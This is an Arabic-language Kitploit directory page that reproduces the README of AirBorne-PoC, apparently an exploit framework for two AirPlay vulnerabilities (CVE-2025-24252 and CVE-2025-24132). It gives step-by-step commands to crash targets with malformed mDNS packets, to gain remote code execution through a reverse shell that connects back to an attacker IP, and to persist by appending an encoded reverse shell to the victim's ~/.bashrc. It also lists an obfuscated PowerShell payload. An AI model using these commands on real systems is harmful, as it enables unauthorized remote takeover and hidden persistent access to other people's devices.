Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
AirBorne-PoC — إثبات المفهوم لـ CVE-2025-24252 و CVE-2025-24132 | Kitploit
أدوات/GitHubGitHub/ekomssavior/airborne-poc
آليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالشيل كودما بعد الاستغلالالقيادة والسيطرةأداة الوصول عن بعدتطوير الحمولاتاستغلال الملفات الثنائية
GitHubekomssavior/airborne-poc

AirBorne-PoC

إثبات المفهوم لـ CVE-2025-24252 و CVE-2025-24132

1642743منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
مشاركة

إطار عمل AirBorne PoC – إصدار RCE النخبة

إطار عمل PoC كامل لـ CVE-2025-24252 و CVE-2025-24132
بواسطة ekomsSavior |

AirBorne هو إطار عمل برهان مفهوم (PoC) مشترك يستهدف ثغرتين خطيرتين في خدمة AirPlay من Apple. يتضمن مشغل تعطل كامل واستغلال شل عكسي يعمل مع استمرارية اختيارية، ومستمع، وتنسيقات حمولات متعددة — كل ذلك في سكريبت واحد.

هل تبحث عن النسخة الأصلية؟
الإصدار القديم لا يزال متاحًا في فرع legacy من هذا المستودع.
للتحقق منه:

root@kitploit:~
git checkout legacy

الثغرات المغطاة

CVE-2025-24252 – تعطل سجل mDNS TXT

  • يؤدي إلى تعطل في خفي AirPlayReceiver عبر حزمة mDNS مشوهة
  • يعمل عبر بث UDP على المنفذ 5353

CVE-2025-24132 – تجاوز الكومة ← شل عكسي (RCE)

  • يؤدي إلى تجاوز الكومة في خدمة TCP الخاصة بـ AirPlay على المنفذ 7000
  • يدعم حمولات الشل العكسي bash, python, و PowerShell
  • يتضمن استمرارية اختيارية باستخدام حقن .bashrc (لينكس)

  • البدء

    1. استنساخ المستودع

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. تثبيت التبعيات

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    دليل التشغيل

    السكريبت الوحيد airborne.py يتضمن كلا البرهانين وجميع المنطق:

    • اختر ثغرة باستخدام --exploit
    • عيّن حمولة شل عكسي باستخدام --payload
    • يبدأ تلقائيًا مستمع netcat لك
    • يمكّن الاستمرارية اختياريًا على الهدف باستخدام --persistent

    أمثلة الاستخدام

    تعطيل الهدف بحزمة mDNS (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    يتطلب واجهة في وضع المراقبة.


    تشغيل تجاوز الكومة → RCE (CVE-2025-24132)

    ابدأ الاستغلال الكامل مع شل bash الافتراضي:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    اختر شل Python بدلاً من ذلك:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    تمكين الاستمرارية الحقيقية على أهداف لينكس:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    حقن أوامر الشل فقط

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    خيارات الحمولة

    الحمولةالوصف
    bashشل عكسي bash افتراضي عبر TCP
    pythonشل عكسي يعتمد على Python باستخدام socket و pty
    powershellحمولة RCE كاملة لـ Windows PowerShell (مشوشة)

    وضع الاستمرارية

    عند استخدام --persistent، سيقوم السكريبت بإلحاق حمولة الشل العكسي المشفرة إلى ملف الهدف:

    root@kitploit:~
    ~/.bashrc
    

    يضمن ذلك إعادة شل إليك في كل مرة يسجل فيها المستخدم الدخول أو يتم إنشاء طرفية.


    ملاحظات الصيانة

    • يتم تشفير الشل العكسي باستخدام base64 وتسليمه بعد تجاوز سعة المخزن المؤقت
    • يتم إرسال جميع الحمولات عبر المنفذ 7000
    • تنتقل حزم mDNS عبر UDP 5353 وتتطلب إذن socket خام
    • تأكد من أن عنوان IP لجهاز الهجوم الخاص بك يمكن للجهاز الهدف الوصول إليه
    • يعالج السكريبت حالات الخطأ الأساسية ويفشل بصمت إذا كانت المنافذ مغلقة

    إخلاء مسؤولية أخلاقي

    هذا المشروع مخصص للأغراض التعليمية والأخلاقية والبحث المصرح به فقط.

    • يجب أن يكون لديك إذن صريح لاختبار النظام الهدف.
    • أنت تتحمل المسؤولية الكاملة عن أي إجراءات يتم اتخاذها.

    استغلال الأنظمة دون إذن غير قانوني وغير أخلاقي.


    الاعتمادات

    • بني بواسطة ekomsSavior
    • مستوحى من ثغرات CVE حقيقية وأبحاث تطوير الاستغلال
    تنزيل الأداة